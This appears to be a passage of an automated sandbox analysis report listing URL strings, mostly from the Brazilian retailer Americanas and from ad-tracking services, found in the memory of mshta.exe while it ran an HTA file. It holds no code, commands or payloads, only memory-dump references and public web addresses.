Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542551165.0000000007CCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.lasa.com.br
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s-apps.americanas.com.br/responsys/cr.php
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202412090101/pubads_impl.js...k
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542171761.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: mshta.exe, 00000000.00000003.542171761.0000000007C86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsCE
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsCameB
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsk
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/garantia-estendida
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/instalacao-ar-condicionado-split
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535526908.0000000005340000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furto
Source: mshta.exe, 00000000.00000003.550120769.00000000055C2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.556949503.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.551976560.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.556704828.00000000046CD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.556794760.00000000046CE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.353830194.0000000000C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.criteo.net/js/ld/ld.js
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540036771.00000000079E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540695026.00000000079E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557762642.000000000413A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D35000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540350568.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-template-americanas-mobile
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533591245.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557771926.0000000004102000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.550274332.0000000004101000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533630685.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533673256.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533565712.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-glob
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533591245.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557771926.0000000004102000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.550274332.0000000004101000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540036771.00000000079E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533630685.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540695026.00000000079E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533673256.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533565712.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-head
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540036771.00000000079E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540695026.00000000079E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557762642.000000000413A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D15000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-miss
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538153103.0000000007D6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548481944.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540036771.00000000079E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540695026.00000000079E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557762642.000000000413A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533534521.000000000413B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D35000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540745247.0000000007A96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533548535.0000000004142000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536957836.0000000007D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-zion
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548481944.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533534521.000000000413B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533548535.0000000004142000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548567226.0000000005D2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wad
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533591245.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557771926.0000000004102000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.550274332.0000000004101000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533630685.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533673256.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533565712.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-theme
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548481944.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540036771.00000000079E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540695026.00000000079E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557762642.000000000413A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533534521.000000000413B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533514331.0000000004139000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540745247.0000000007A96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533548535.0000000004142000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-zion-
Source: mshta.exe, 00000000.00000003.533591245.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557771926.0000000004102000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.550274332.0000000004101000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533630685.00000000040FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533673256.00000000040FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.533565712.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/main.30defc488d62244ec738.js
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000044AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548481944.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/spacey/acom/2024/06/25/DESK_APP-ATL-SERVICO-GIFTCARD-9f3f630fb4f0-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://venda.americanasmarketplace.com.br/cadastre-sua-loja/?epar=bo_ax_cte_am_app_banner&utm_sourc
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wishlist-v1-americanas.b2w.ioSunga
